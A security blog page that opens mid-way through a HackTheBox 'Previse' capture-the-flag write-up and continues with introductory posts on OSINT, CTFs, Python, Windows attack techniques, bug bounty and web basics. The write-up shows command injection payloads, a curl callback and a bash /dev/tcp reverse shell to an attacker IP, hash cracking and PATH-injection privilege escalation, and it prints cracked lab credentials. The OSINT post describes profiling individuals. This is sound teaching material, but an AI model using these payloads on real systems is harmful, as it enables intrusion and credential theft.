/header.php (Status: 200)
/footer.php (Status: 200)
/nav.php (Status: 200)

Let's try enumerating each of the pages and learning what each of them are for. We can inspect them using a popular web application security audit tool, Burp Suite.

`/nav`

After inspecting each of the pages, I notice /nav page displays a navigation page that leads to more directories on the site.

`/index.php`

Just the "main page". Often times /index.php is just a splash page.

`/accounts.php`

This is clearly a page that only administrators should see. If we could find a way to control this page, we can create an account for ourselves and authenticate.

`/files.php`

This page seems to be another "admin only" page. It has file upload/download functionality, so we may be able to leverage that later.

`/status.php`

This tells us that there is a SQL server online, the amount of files uploaded and shows how many administrators are logged in simultaneously. This information may be valuable later as well.

/file_logs.php

This page is responsible for outputting the logfiles as a comma, tab, or space delimited files.

Adding our own account

I decided to just look at the source code of the page to add my own account.

Looking back at the /accounts.php page, we can see within the source code a few of the parameters required to create a new user.

We can see the typical username,password and confirm fields.

From here, we submit a request that creates an administrative account.

Adding the user

username=SSHad0w&password=SSHad0w&confirm=SSHad0w

Authenticated

Once we submit the form, we are allowed to log in to the file hosting server.

Just to check, we browse over to the status.php page to ensure that the number of admins increased.

If you're using this box alone, there will only be 2 admins, but if you created multiple accounts or there are other people in the lab, you may see a higher number.

Downloading log files

We can download log file as CSV, TSV, or SSV.

Downloading the site backups

Now that we have access, let's download the source code of the website.

We can unzip it with the unzip command.

Source code disclosure

Now, we can peer into the PHP to learn more about the site functionality and hunt of vulnerabilities using static source code analysis. Let's put our PHP hat on!

`Download.php`

The download.php file contains the following:

<?php                             
session_start();                  
if (!isset($_SESSION['user'])) {  
    header('Location: login.php');
    exit;
}                                 
?> 

<?php include( 'config.php' ); ?>

<?php
if (isset($_GET['file'])) {
    // Log all file attempts, because security is important!!
    $logFilename = "/var/www/file_access.log";
    $epochTime = getdate()[0];
    $logMsg = "{$epochTime},{$_SESSION['user']},{$_GET['file']}";
    file_put_contents($logFilename, $logMsg . "\n", FILE_APPEND);
    if (!filter_var($_GET['file'], FILTER_VALIDATE_INT)) {
        http_response_code(404);
        exit;
    } else {
        $fileId = filter_var($_GET['file'], FILTER_SANITIZE_NUMBER_INT);
        $db = connectDB();
        if ($db === false) {
            die("ERROR: Could not connect. " . $db->connect_error);
        } else {
        $sql = "SELECT name, size, data FROM files WHERE id = {$fileId} limit 1;";
        $result = $db->query($sql);
        $row = mysqli_fetch_assoc($result);
        header("Content-Description: File Transfer");
        header("Content-Type: application/octet-stream");
        header("Content-Length: " . $row['size']);
        header("Content-Disposition: attachment; filename=" . $row['name']);
        ob_clean(); // Discard any data in the output buffer
        flush(); // Flush system headers
        echo $row['data'];
        $result->free();
        }
    }
    $db->close();
} else {
echo '<div class="uk-alert-danger">Nothing requested!</div>';
}
?>

Immediately, my eye is drawn to the line that contains the include() method. The PHP include() method is know to be a security issue.

Since the config.php page is the one the include() method references, I assume that the db credentials may be stored in that file.

Let's check out config.php.

`config.php`

Most files named config.* have some sort of credentials, default configuration settings, or other important information that helps lead to security incidents when in the wrong hands. Here we can see plaintext database credentials that may be useful later.

<?php
function connectDB(){
    $host = 'localhost';
    $user = 'root';
    $passwd = 'mySQL_p@ssw0rd!:)';
    $db = 'previse';
    $mycon = new mysqli($host, $user, $passwd, $db);
    return $mycon;
}
?>

SQL Credentials

The config.php file include download.php file contains credentials to the database.

Credentials:
root:mySQL_p@ssw0rd!:)

Database name:

previse

Connecting to the database

I can't yet because the port isn't open on the outside. I have to get on the box first. I have a prevision that we'll be logging into a SQL server soon!

`file_logs.php`

On this page, we have a statement that utilizes a different language to parse files. The PHP exec() command executes shell commands directly on the operating system itself, so while this appears to be a python expression, this is actually a bash command executing the python binary.

<?php
session_start();
if (!isset($_SESSION['user'])) {
    header('Location: login.php');
    exit;
}
?>

<?php
if (!$_SERVER['REQUEST_METHOD'] == 'POST') {
    header('Location: login.php');
    exit;
}

/////////////////////////////////////////////////////////////////////////////////////
//I tried really hard to parse the log delims in PHP, but python was SO MUCH EASIER//
/////////////////////////////////////////////////////////////////////////////////////

$output = exec("/usr/bin/python /opt/scripts/log_process.py {$_POST['delim']}");
echo $output;

$filepath = "/var/www/out.log";
$filename = "out.log";    

if(file_exists($filepath)) {
    header('Content-Description: File Transfer');
    header('Content-Type: application/octet-stream');
    header('Content-Disposition: attachment; filename="'.basename($filepath).'"');
    header('Expires: 0');
    header('Cache-Control: must-revalidate');
    header('Pragma: public');
    header('Content-Length: ' . filesize($filepath));
    ob_clean(); // Discard data in the output buffer
    flush(); // Flush system headers
    readfile($filepath);
    die();
} else {
    http_response_code(404);
    die();
} 
?>

Since we have control over the input, we can try to inject commands into this poorly implemented parsing string.

Discovering blind command injection

Because of the implementation of this Blind OS command Injection vulnerability, we are not able to read STDOUT, but we still have a few ways to verify that we are controlling the webserver.

Time based OS injection

As it says on Portswigger.net:

"You can use an injected command that will trigger a time delay, allowing you to confirm that the command was executed based on the time that the application takes to respond. The ping command is an effective way to do this, as it lets you specify the number of ICMP packets to send, and therefore the time taken for the command to run.""

A simplified version of the above: "Use a time delay command to force the server to wait before giving you a response."

This is the request when it hasn't be augmented (cut down to the vulnerable parameter for space reasons):
delim=tab
It takes approximately 462 milliseconds.

delim=tab&&ping -c 20 google.com (remember to URL encode!)
Takes approximately 7,186 milliseconds.

This is a positive result, but let's confirm it with the sleep command.

Payload:
delim=tab&&sleep 20
Url encoded payload:
delim=tab%26%26sleep%2020
Takes approximately 20,488 milliseconds.

This is perfect! It takes approximately ~470 ms to respond, and the extra time is from our sleep command. We have confirmed remote code execution, or RCE for short.

Using curl to test remote code execution

Before we move on, let's learn another way to confirm RCE. Hackers often have to understand many ways to complete a task, as one may not work from time to time. Let's use curl (a popular command line request tool for *nix systems.)

Step 1.
Start a listener on your attack machine with a command like nc -nvlp 4444 (or use your favorite listener).

delim=tab;curl 10.10.14.10:4444 (Remember to URL encode!)

Some people prefer this as a proof of concept because they can connect back to themselves.

Popping a reverse shell

Now that we have RCE, we will leverage it to give ourselves a reverse shell.

Step 1.
Start a listener on your attack machine with a command like nc -nvlp 4444 (or use your favorite listener).

Payload:

delim=comma%26%26/bin/bash+-c+'bash+-i+>+/dev/tcp/10.10.14.10/4444+0>%261'

Upgrading the shell

Since I see the python binary, I am going to upgrade the shell using the following: python -c 'import pty; pty.spawn("/bin/bash")'

This allows us to use a lot more features, and even have a more stable connection.

Privilege Escalation

Now that we have a shell, we want to gain more access. www-data can preform certain actions that unauthenticated users can't, but our goal is to gain total access over the machine.

Even though we would normally go through our typical privesc techniques and post exploitation enumeration methods, we are first going to investigate the database with the credentials we found earlier.

Locating MySQL

First, we will check if we have telnet on the machine to see if we can reach the instance of MySQL from the inside of the machine.

It seems the machine accepts connections from localhost on port 3306.

Let's attempt to login with the credentials we found earlier:

Logging into MySQL

mysql -u root -p'mySQL_p@ssw0rd!:)'

Note that the password does NOT have a space after the -p flag and that it is enclosed in single quotes. ' These two things are very important when establishing a local connection with a mysql server.

Example:

Enumerating the MySQL database

Now that we've authenticated, let's enumerate the database.

We can use the show databases command to show the databases within this instance of SQL. Keep in mind that the previse database was the one references in the PHP file earlier. Let's check that one out first.

First we use the show databases command to show the databases within this instance of SQL. From there, we use the use command, to select the database we'd like to inspect, and the describe command to inspect tables within the database we're currently using.

Finding the passwords

After running the command select username, password, from accounts;, we can see the password hashes for all of the accounts on the site. Including the first admin, m4lwhere.

+----------+------------------------------------+
| username | password                           |
+----------+------------------------------------+
| m4lwhere | $1$🧂llol$DQpmdvnb7EeuO6UaqRItf. |
| SSHad0w  | $1$🧂llol$elwMtr/dbrrAdw/Eb6S/K. |
+----------+------------------------------------+
2 rows in set (0.00 sec)

A few basic sql privesc commands to try before leaving

Understanding the hashes

Now that we've found the hashes, we need to talk about how password hashes work before we attempt to crack them.

Breaking down the hash:

Take this hash for example:

$1$🧂llol$DQpmdvnb7EeuO6UaqRItf.

As explained here, each $ denotes a new section of the hash. The first $ denotes the type of hash, the second $ denotes the salt, and the characters after 3rd $ is the hash itself.

A direct quote:

"...A password encrypted by one of these algorithms would look like $1$salt$encrypted (for MD5), $5$salt$encrypted (for SHA-256), or $6$salt$encrypted (for SHA-512), where each $ is a literal $ character, where salt is a salt of up to 16 characters, and where encrypted is the actual hash."

This will be be very important when we crack the hashes.

Identifying the hash algorithm

Even though the above excerpt explains that "one of these algorithms would look like $1$salt$encrypted (for MD5)", we will go through the process of identifying the hash algorithm to familiarize ourselves with the process, and prepare for when we do not recognize the hash type immediately.

Hashcat

Even though there are many ways to do this, we will use hashcat . Hashcat a powerful password cracking tool. Hashcat has an --example-hashes flag will show a lot of standard hash types and what their signatures are. From there, we look for any patterns that match the $1 pattern we see at the beginning of our hashes.

hashcat --example-hashes | grep '\$1' -B4

┌──(kali㉿kali)-[~/Documents/htb/previse]                  
└─$ hashcat --example-hashes | grep '\$1' -B4
HASH: $P$946647711V1klyitUYhtB8Yw5DMA/w.
PASS: hashcat
MODE: 500    
TYPE: md5crypt, MD5 (Unix), Cisco-IOS $1$ (MD5)           
HASH: $1$38652870$DUjsu4TTlTsOe/xxZ05uf/  
--
PASS: hashcat

Now we know that the hash is MD5. This is a very common type of hash, so some people may know just from looking at it, but now we know how to identify password hashes that we aren't familiar with.

As it says here, MD5 is "mode 500. This will be important later.

Cracking the hashes

Finally! Now that we've done the ground work, we can crack our hashes.

Store the hashes in a file

I put the hashes in a file with a colon delimiter and called it hashes.txt like so:

m4lwhere:$1$🧂llol$DQpmdvnb7EeuO6UaqRItf.
SSHad0w:$1$🧂llol$elwMtr/dbrrAdw/Eb6S/K.

We'll keep using hashcat to crack the hashes. The following command is what we'll use:

hashcat -m 500 hashes.txt /usr/share/wordlists/rockyou.txt --user

A quick breakdown of the command:

The -m 500 tells hashcat to crack using the MD5 algorithm. This way it doesn't waste time trying other possible algorithm.
The /usr/share/wordlists/rockyou.txt is the wordlist that hashcat will compare the hashes to. rockyou.txt is the largest, and widely considered the best wordlist for password cracking.
The --user flag tells hashcat that the username is on the left of the passwords in the standard username:password format. This allows hashcat to keep the username and password together if it finds a match.

We found the password! The credentials are m4lwhere:ilovecody112235!.

Now we can su to the user, or simply login as m4lwhere over SSH.

I prefer SSH for a higher quality shell and more stable connection.

Privilege Escalation

Although there are a 1024 ways to skin a cat, we will try one of the simplest privilege escalation techniques in the book: sudo -l.

This command searches the system for binaries that can be executed as other users, possibly with more (or different) privilege.

Finding and exploiting SUID binaries are very common in boot to root CTFs, so this command is at the top of my list for privesc methodology.

There is s SUID program running as root on the system. If we can exploit that binary, we can gain arbitrary command execution at the root level.

If we had write access, we would simply edit it and write a reverse shell in the script. Since we don't, we'll have to use the environment around it to find a way to execute our code.

Since we have read access, let's view the file:

m4lwhere@previse:~$ cat /opt/scripts/access_backup.sh 
#!/bin/bash

# We always make sure to store logs, we take security SERIOUSLY here

# I know I shouldnt run this as root but I cant figure it out programmatically on my account
# This is configured to run with cron, added to sudo so I can run as needed - we'll fix it later when there's time

gzip -c /var/log/apache2/access.log > /var/backups/$(date --date="yesterday" +%Y%b%d)_access.gz
gzip -c /var/www/file_access.log > /var/backups/$(date --date="yesterday" +%Y%b%d)_file_access.gz

From here, we learn a few things:

This script is being run automatically with a crontab (and we can execute it).
The log file that we write to when we make actions on apache is what's being operated on.

How the script works

It calls a program called gzip which is basically a popular compression program used in the Linux world.

The argument specified -c is used to print the compressed file's contents to STDOUT.

Even in the man pages, there are examples of the user using a redirect operator with the -c option.

Let's try to unzip this compressed text, as we may need to read the data at some point.

As we can see, piping STDIN to gunzip (the antithesis of gzip) displays the original content, or prints it to STDOUT.

Now that we've done that proof of concept, let's try it on the real server.

It works! We can read the zipped files. This may be helpful later.

After doing some enumeration, we see that we do have edit privilege for the /var/www/file_access.log file, and not the other file referenced in the script.

The is the same file that can be downloaded by admins on the webserver.

The date command

The date command is a very simple command used in UNIX to display the exact date and time. Since this program uses the date command as a variable, if I can find a way to control the output of the date command, I can run code as root.

Let's try it on our own machine.

If we can change the version of date being called, we can also control the execution flow of the SUID binary.

We cannot edit the date command, as it is owned by root.

PATH Injection

What we can do is modify the PATH that the date command uses. Even though the binary is owned by root and in /opt/scripts/. We can change our PATH to a world writeable directory (like /tmp, /dev/shm, etc...), write a reverse shell in the false date command and run the binary.

The program views the environment it's being executed in and runs the local version of date instead of the correct version.

This is a standard example of "PATH injection" or "Environment Variable injection".

Root shell

Please let me know in the comments if you have any questions, suggestions, or alternate paths!

Remember to always ask better questions!

30D2R - July: OSINT

SSHad0w — Mon, 04 Jan 2021 01:36:58 +0000

This post is a part of my 30 Days 2 Root challenge series.
Essentially, I am trying to learn the basics of a different facet of cybersecurity each month. Click here to learn about how the challenge works, or tell me what I should study next!

Do you ever wonder how Twitter sleuths and private investigators can find out so much information about an event or person? Or how attackers find information that leads to a huge breach?

It's a skill that requires no programing, hacking, and it's completely legal.

Open source intelligence (OSINT) is a very important tool of any InfoSec practitioner. It is a safe and legal way to collect information about a target because the information is accessible by anyone.

Why do we need OSINT?

When an attacker tries to find a hole in the perimeter of a secure organization, they must gather OSINT to find the weak link. This means that the attacker needs to understand the purpose of the organization, how it's structured, and technical details about it's infrastructure.

Passive VS active OSINT

There are two ways that information can be gathered. Passive reconnaissance and active reconnaissance. Passive recon is only using resources that do not require interaction with the target organization. This is the least risky method because there is no way the organization can trace your information gathering back to you. An example would be looking the organization up on Wikipedia to understand the basics of what the organization does, or who works for it.

Active recon gathers much more information than passive recon, but can be slightly more risky because information gathering attempts can be traced back to the attacker. Active recon can be anything from visiting the organization's website, to calling the organization, to scanning their public-facing servers to understand which services they're running.

Both are necessary to learn about the organization, but active recon requires strong OPSEC.

OSINT on individuals

Social media

One of the biggest problems with the modern day internet culture is oversharing. finding basic information about someone's life like their birthday, the names of their loved ones, their interests, and other things that may help you get an initial foothold. Since a lot of people are aware enough not to overshare, a good idea is to find information about the target by finding the social media of people close to the target.

Username enumeration

Many people use similar usernames for every website they use. Once a username is found, it can be searched to find more websites that the target uses, and more information about the target.

Resumes and CVs

Some people upload their resumes and CVs to publicly accessible places in order to increase exposure, but forget to take it down. This exposes information like their personal phone number, past residences, and possibly physical address.

Company records

Often times, employers will post blogs/messages about their employees (celebratory anniversary messages, project announcements, etc..) that may lead to more information about their personal and professional life.

Publicly available records

Things like driving, marriage, and arrest records, birth and death certificates, and other government-related information are often publicly available. This information will vary depending which part in the world the target resides in and how the government treats that type of information.

OSINT on organization

Most modern organizations list themselves on job listing sites like monster.com or LinkedIn. Finding the name of the organization on these sites will often find more employees related to the company the target works for.

Protip: Enumerate internal architecture by finding the technologies used in the resumes of employees (ex: If someone who works for the organization states that they understand AWS, the organization might be using AWS infrastructure.)

Press releases

Public press releases may lead to information about how the organization is structured, protocols for certain types of situations, and important personnel changes that may lead to a foothold.

News articles

News articles often contain a lot about a organization that they aren't willing to share themselves. Typically this information will be more honest, wholistic, and a different prospective than the press releases from the organization itself.

For example, a government may claim to uphold all international laws, but the news about them may state otherwise.

Common tools and techniques

There are a million ways to find information about a person or organization with OSINT, but here are some of the things I use:

There are many ways to preform OSINT, but the best way is to use your favorite search engine. It is a very powerful tool in any hacker's toolbox that can lead to the initial foothold inside of an organization.

Stay curious, and remember:

If page two of google is the best place to hide a body, a good OSINT researcher can find the skeletons in anyone's closet.

30D2R - June: Introduction to CTFs

SSHad0w — Sat, 12 Dec 2020 03:58:06 +0000

Capture the Flag competitions are computer challenges for people in Cybersecurity that help security enthusiasts hone their skills, meet new people, and try new things. Think of these competitions as a sandbox for people to play in with minimal risk to real machines or people in an a realistic setting.

While CTFs can have defensive or forensic aspects to them, they are primarily designed for hackers to test their skills. Since June marked the halfway point in my 30 Days to Root Challenge, I figured I might as well take some time to test my skills.

Sites

There are many sites to play CTFs. My favorite is HackTheBox, but there are many others. Here are some examples:

HackThebox
TryHackMe

There are two different types of CTFs: live CTFs, and Boot 2 Root CTFs. The B2R CTFs are hosted on a virtual machine and typically are accessed and activated on the website, and there is a VPN to access the server side virtual machine.

In live CTFs, there are event organizers that have a web page with all of the challenges available. These CTFs have a set start and end time, and teams are more likley to participate than a single person, but single-person teams are typically welcomed as well.

Boot 2 Root CTF Methodology

Typically the methodology of a Boot 2 Root CTF is starting at a webpage to understand the functionality of the machine, and scan further to find vulnerabilities. From there, checking to see if there have been any recent CVEs that may be related to the machine. Once accessed, pivoting may be required.

Live CTF Methodology

Live CTFs are typically jeopardy style CTFs. This means that each of the challenges are separated into categories that can be chosen from and completed individually.

This style can be helpful for teams to split up and focus on the things that they specialize in. For solo CTF players, this can help identify weaknesses and gaps in their knowledge.

How do I get started?

The answer to this is one simple word: Writeups! Reading writeups/watching solution videos is the number one way to get better at CTFs.

What is a writeup? At the end of every CTF, the people who created the CTF, or the participants tell how they solved the challenges in the CTF. Once these are posted, the people who didn't understand the challenge can go and read the answer so they can better understand similar challenges in the future.

The thing is- nothing is stopping you from reading writeups of CTFs that you were never in! If you watch/read enough solutions, you begin to adopt a methodology for that specific type of challenge when you see it in a CTF. Here's a good starting place.

Here's another one.

Those are just a few writeups, but there are literally thousands of writeups online! You can learn any skill by simply searching the desired topic and the word "writeup". It's as simple as that!

Since I use HackTheBox a lot, my favorite site for writeups is ippsec.rocks. He is amazing at explanations!

Once you begin to explore the world of CTFs, you won't be able to stop. If you get good enough, you can even translate it into financial gain by playing CTFs that you win money for, or getting a job as a Penetration Tester!

Resources

Here's a video from an amazing Youtube channel

Another video from the same channel about CTFs

30D2R - May: Python

SSHad0w — Sat, 12 Dec 2020 03:45:43 +0000

One of the most lightweight, accessible, easy to learn programing languages in all of InfoSec has been learning Python. This powerful language has dominated the first few decades of the 21st century and has been a skill in high demand for anyone in any technical job.

Even though Python can be used for things like web development, back end development, software development, and data science, we will focus on Python scripting, as most hackers are well versed in scripting in this interpreted language.

Networking

Imagine you're a penetration tester. You just got your first reverse shell back and you've found that you will be detected if you download anything like Nmap. What do you do? You have to build your own port scanner.

The Scapy module Python can be used to create a networking tools like port scanners on the fly when Nmap isn't available in the post exploitation phase. There's tons of classes and videos about this online.

On the inside

Python can also interact with files. In a traditional use of python, this could be used to unzip or rename a large amount of files. In the mindset of a hacker, one could use a local instance of Python to download specific files in an attempt to gain a shell, or for data exfiltration.

Payloads and exploits

Just as Python can be used to write useful automation scripts, it can also be used to write exploits. if a target system has a Python install, the attacker can write a Python script that does the work for them. Even if the target machine does not have a Python installation, tools can still be written in Python to help automate the exploitation phase.

Persistence

Once on the network, Python can be used to establish persistence with python-like crontabs that continue to execute even after the process has been killed.

Privilege escalation

Python can can be used to automatically find if certain directories or files are available and writable, rather than manually checking for every available place.

Python can be a very powerful language for Penetration Testers. There are countless opportunities for penetration testers when the understand the basics of the language. It's easy-to-pick-up style is wonderful for beginners to take advantage of as well.

Resources

There are a million ways to learn Python, but here's some of my favorites:

Youtube course

Python for Pentesters (Udemy course)

Violent Python (Book)

There are many other Youtube videos, Udemy courses, and books that can teach you the basics of what you need to know!

30D2R - April: Windows Exploitation Basics

SSHad0w — Tue, 25 Aug 2020 01:21:31 +0000

Windows. There's literally no way you've never heard of the operating system before. Over a billion systems worldwide run Windows. This includes everything from Everyday devices like personal computers and phones, to business infrastructure like coca cola freestyle machines and point of sales machines like card readers, all the way to critical infrastructure like power grids and water filtration center infrastructure.

Point is, the world is dominated by this operating system, so it'd better be secure.

This is why I decided to pull back the pane on Windows in April.

File sharing

When it comes to Windows, there are a multitude of options available for sharing files over a network. Some of the most common ways are FTP and SMB. Although there are many other ways, learning the basics of these two protocols will help you understand more complex services like SAMBA and CIFS.

File Transfer Protocol

The File Transfer Protocol or FTP is a simple client/server architecture that allows one computer to stand up a server with files while other computers with the protocol client infrastructure installed can interact with this server. Although FTP is on both *nix systems and Windows systems, it is still a very common way to share files on a LAN or WAN.

There is a feature called "anonymous login" which is colloquially referred to as "FTP anon". This allows anyone who has access to the

Server Message Block

Server Message Block is a versatile and powerful windows
staple when it comes to file sharing. SMB can be used to print, send files within networks, and editing files as a group. This is done by using trusts between computers within networks. These trusts can be abused to exploit the relationships between these computers, leak information, and possibly escalate privileges. Tools like Smbmap and Smbclient can help facilitate leveraging this protocol.

Remote control without shells

Often times, these tools aren't even special "Hacker tools". These are the same tools being used by administrators that the hackers just use to their advantage. These types of things are much harder to detect.

Windows remote functionality is no different.

Once the hacker penetrates the network and gains the credentials needed to to authenticate, the hacker uses RDP to watch the computers silently in the background, and possibly control them when no one is watching. This is why there should always be strong password and extensive logging if the service needs to be used. If the service isn't required in the organization, turn the feature off and make sure the port remains closed.

Remote Desktop Protocol

Imagine you're a manager in an corporate enterprise. No matter what your business is, some part of your enterprise will consist of a department that many people have to be on computers in.

You'd need to know who's doing what, like who's actually doing work, who's following security protocols, and who has been away from their desk for too long. The IT help desk may even need to see the screens of the employees

These same tools can be used and leveraged by the attacker.
When the attacker uses RDP, they may pretend to be an administrator, or simply misuse this function for nefarious purposes. Mitigation is much more difficult because it typically means a human has to verify the validity of each RDP session, because the organization may use RDP for legitimate purposes.

Remote Procedure Call

Much like RDP, RPC is a client server feature in Windows machines that allow one computer to call a procedure in another machine. This is another tool that is typically used by Sysadmins but hijacked by hackers. It doesn't have a complete GUI like RDP, but it is just as powerful and can be abused by people with malicious intent.

Evil Winrm

Windows also has a remote management protocol that functions very similarly to SSH. Even though windows does support SSH, this is another tool designed for server administrators that is often abused by attackers

This is known as WinRM (Windows remote management). In July of 2014, OscarAkaElvis released EvilWinRM on Github. This easily allowed pentesters to abuse this feature to remotely connect and control computers using the same protocol that SysAdmins do.

Powershell

Powershell is the native scripting language of the Windows operating system. Powershell is the Windows version of Bash. This language can do anything so becoming well versed in this language would be a powerful skill that would make anyone an extremely effective Windows hacker. Not only this, but learning this language means that no outside tools based on python or ruby have to be put on the computer if the attacker can build them in Powershell. This allows the attacker to be much more stealthy.

Privesc

There are countless ways to skin the cat that is Windows privilege escalation. The most common ways are using syskey attacks, getsystem, or exploiting executable files. More advanced techniques are things like DLL hijacking, Binary path escalation or deploying a Kernel exploit.

As you can see, most if not all of Windows hacking techniques are simply using its functionality against itself. Most of the tools and techniques I showed you today did not involve a special method that only hackers use, I showed you the same tools and protocols used by Blue teamers and regular users of Windows use every single day. The only thing that changed was the intent on how they were used. Once again, this goes to show that hacking is a mentality, not a skill.

30D2R - March: Bug Bounty Basics

SSHad0w — Sun, 21 Jun 2020 03:18:04 +0000

Why is Bug Bounty needed?

Nowadays, every organization needs a website to reach further audiences. Businesses need more people to see their product, nonprofits need a place to accept donations, and schools and governments can register people in their systems without having to wait in long lines. Websites and apps have become the cornerstone of our society. We order products and services on them, we trust they're they only ones with our private information like passwords or PII that could allow someone steal your identity. Sometimes we even give them access to our cameras, microphone and contacts to enable full functionality.

What would happen if an attacker could access all of this?

This is why organizations need their WebApp assets tested. Needless to say, this skill is in extremely high demand in the age of websites being the point of contact and point of sale for most companies. To ensure the privacy and safety of their users, these organizations start a bug bounty program.

What is Bug Bounty?

When companies start a bounty program, they typically partner with a platform that hosts their bounty program. Some larger companies host and manage their program on their own, but most use a bounty platform like Hackerone or Bugcrowd to host the program.

The program owners establish a scope, prices for bounties and any other information the researchers may need for their testing such as login information for a tester account.

After the program is posted, freelance security researchers test the assets in scope until they find a vulnerability. Once a vulnerability is found, the researcher reports it to the security management team, and the team triages the report.

Platforms

There are many bug bounty platforms for bug bounty. The two biggest ones are Hackerone and Bugcrowd. These platforms do have a few differences, but for the most part they both allow researchers to chose from a collection of bounty programs and start hacking as soon as they sign up.

Just because Hackerone and Bugcrowd are the most popular platforms, that doesn't mean that there aren't other ones out there. Most larger companies have a web page or an email specifically designed for submitting bugs. If you find a bug accidentally, make sure that you check to see if the organization has a bounty program. Even if they don't, still submit the bug to an official email address owned by the organization.

Private programs

When a user on a platform has enough clout (which is gained by successfully submitting quality reports and triaging bugs successfully), sometimes they may earn an invite into a private program.

Private programs are exactly like public programs, but with less researchers involved. Private programs are typically invite-only.

How private programs benefit organizations:

Researchers with specific skill sets can be invited into the program to test in technologies that they're already familiar with
There are less researchers to work with, so the triage team and the researchers can create better relationships and and more attention can be given to specific researchers.
If the testing environment contains proprietary or secret information, the organization can control who does and doesn't have access to it (Sometimes this can mean that NDAs will be signed or background checks will be run prior to joining)

How private programs benefit researchers:

A smaller amount of people allows for more money to be paid out to each bounty researcher
A large problem in public programs is that lots of people have the the same idea so they send in a report about exploiting the same vulnerability
A smaller amount of people in programs allows the researcher to be heard and their bugs can be addressed faster.
Organizations can also raise and lower Bounty prices to give incentive. Especially if a new feature has been added recently.

Methodology

There are many different methodologies for hunting bugs. The only requirement is understanding how a website works and having a mindset of how to subvert security protocols or access things that shouldn't be available.

Here's a few methodologies I've heard while researching

Learn a single bug type and look for it on every program. Once you've gotten good at it, move on to another.
Read the OWASP top 10, learn how to identify and exploit the entire list, then look for those bugs in every platform.
Enroll in a bug Bounty bootcamp/course and follow the instructor

Typical bugs

Every year, the most common bug types are recorded and culminated into a list called the OWASP top ten. It consists of the top ten vulnerabilities in the last year. These are typically the most common vulnerability in the year following.

https://owasp.org/www-project-top-ten/

*** NOTE: Lots of people use this strategy, if you decide to follow this strategy, you will find lots of bugs at the expense of finding out others had already found them most of the time.

Automation

Lots of the time, manually enumerating a website take a long time. Clicking every button, visiting every page and every single input field can be tedious and slow. This slowness can also lead to having duplicates, which is extremely frustrating.

The way to solve this is automation. why spend 30 minutes looking for a possible xss when you can spend 30 seconds running a script that tells you if its there and instantly and submits the report?

This is why scripting is such a powerful tool that separates intermediate and advanced hackers. The sooner you learn scripting, the faster you become an effective and efficient hacker.

How to generate a quality report

SCREENSHOTS, SCREENSHOTS, SCREENSHOTS. Providing a quality proof of concept with a clear video or a step-by-step guide how to exploit the bug. Taking extensive notes helps a lot with this.
Be respectful and professional. You're still talking to real people who are trying to improve the security posture of the internet. Needless to say, being rude probably wouldn't help the amount of bounty you earn.
Explain the impact of the bug! This is a step lots of people miss. Explain how the bug could impact the organization and how they can triage the issue. As I read on the Hackerone blog, a "User database leak means a lot more to Pornhub than it does to Twitter". Anything that deals with money, passwords or names has lots of impact.

Here's a good video by Bugcrowd on quality report generation

The bug bounty life is not easy. It requires lots of discipline and hard work to learn the skills, apply them in a practical situation, and write about them in a way in which someone else will understand. That is not easy at the beginning. Persistence goes a long way when deciding to become a bug bounty hunter.

30D2R - February: Web Application Basics

SSHad0w — Thu, 04 Jun 2020 22:48:20 +0000

Nowadays, every organization needs a website to reach further audiences. Businesses need more people to see their product, nonprofits need a place to accept donations, and schools and governments can register people in their systems without having to wait in long lines. Websites and apps have become the cornerstone of our society. We order products and services on them, we trust they're they only ones with our private information like passwords or PII that could allow someone steal your identity, and we sometimes give them access to our cameras, microphone and contacts to enable full functionality.

What would happen if an attacker could access all of this?

This is why organizations need their WebApp assets tested. To ensure the privacy and safety of their users. Needless to say, this skill is in extremely high demand in the age of websites being the point of contact and point of sale for most companies.

Before I learned how to attack websites, I needed to know how they worked. So today, we will explore how websites work. This knowledge helped me understand the basics of Bug Bounty (Which I will cover in the next post)

Every time a user interacts with a WebApp, the application, API, or browser (also known as the "Client") contacts the server and makes a request. This request is then sent to the server and the server reads the request and sends the client a response back. The information in the request and response may only be text, but this text is interpreted into the websites and apps we know and love.

What is a request?

A web request is the message that goes from your browser to the web server. It's called a "request" because it "requests" information from the web server.

These are the standard parts of an HTTP request.

These are the most common parts of a request:

The method

Each individual request does an action known as a method. These are the most common methods:

For security reasons, these methods aren't always allowed, as they can be used to exploit security holes in the server's infrastructure.

The headers

The headers mostly tell the server information about the client, and data about the message itself. This metadata is part of what preserves the integrity and ensures the security of the message.

The body

The body can contain whatever information the user is trying to submit to the server. For example, if the server has three files on it and the method of the request is "DELETE", the server needs to know which file to delete. This type of information is stored in the body of the request.

The Cookie

You've probably seen messages like this on some of your favorite websites, but what do they mean?

A cookie is a personal identifier that is given to each site visitor that basically tells the server who is who. Cookies are primarily for websites to remember things like what you've already browsed, or information that helps advertisers. Without unique identification, the website may not be able to tell who is who, and one person may be able to hijack the session of another user. There are alternatives to cookies, like JSON web tokens, and other things, but they are all essentially used to identify sessions.

A short video on the basic parts of a request

What is a response?

After the client sends the request to the server, the server gives a response.

A typical response has the following elements.

A Status-line

When the server gives back a response, it responds with a status code. This code indicates the state of the response.

If you look at the photo, you see that there's a clear pattern. if the response has a status code that that starts with a:

2; The response is a success! If there is content on the page, you should see it loading.
3; The page you requested works, but it's redirecting you to another.
4; Client error. Something on your side isn't working.
5; Server error. Something on the server side isn't working.

So if the response status code begins with a 2 or 3, everything works. However, if the response code starts with a 4 or 5, there is some sort of error.

Header information

This type of information can vary in many ways. This tells more about the connection and website itself.

The body

The body typically holds the actual HTML in the webpage, sometimes JavaScript and pretty much anything else that the page returns.

Here is a much more in depth look at responses

What is URL encoding?

If you've ever used a terminal, or any programming language, you understand that there are two different types of characters. There are readable characters like these and there are "special" characters like "!@#$%^&*()" and more. These types of characters are used in the computers native language, which is why no one can create a filename with a "/" in it. In Linux systems, that character represents a new directory.

People put these types of special characters in articles, headers, or other parts of text that end up in the link. The machine that reads the link cannot tell the difference between a "+" put in the name of the article and the + in the native language, so it translates that character to text that the machine reads and translates back without executing any undesired characters.

As an example, search "Hello" on google and observe the link.
Then search "+" on google and observe how there is no "+" in the link. It will have been translated to "%2B".

How do I know what it will be encoded to? Each character has its own translation, and there are many translators online that can encode and decode characters.

These characters are in the requests so the server understands them, and are automatically decoded back in the response.

Subdomains

A subdomain in simply another website that the organization owns that is attached to the root domain. A subdomain can look like a few different things.

Google.com (root domain)
Google.com/docs (subdomain)
Mail.google.com (also a subdomain)

Sometimes companies will spend more resources in protecting and securing the assets on the parent domain and neglect the subdomains. This is why lots of website testers like to enumerate the subdomains to test each domain's security posture.

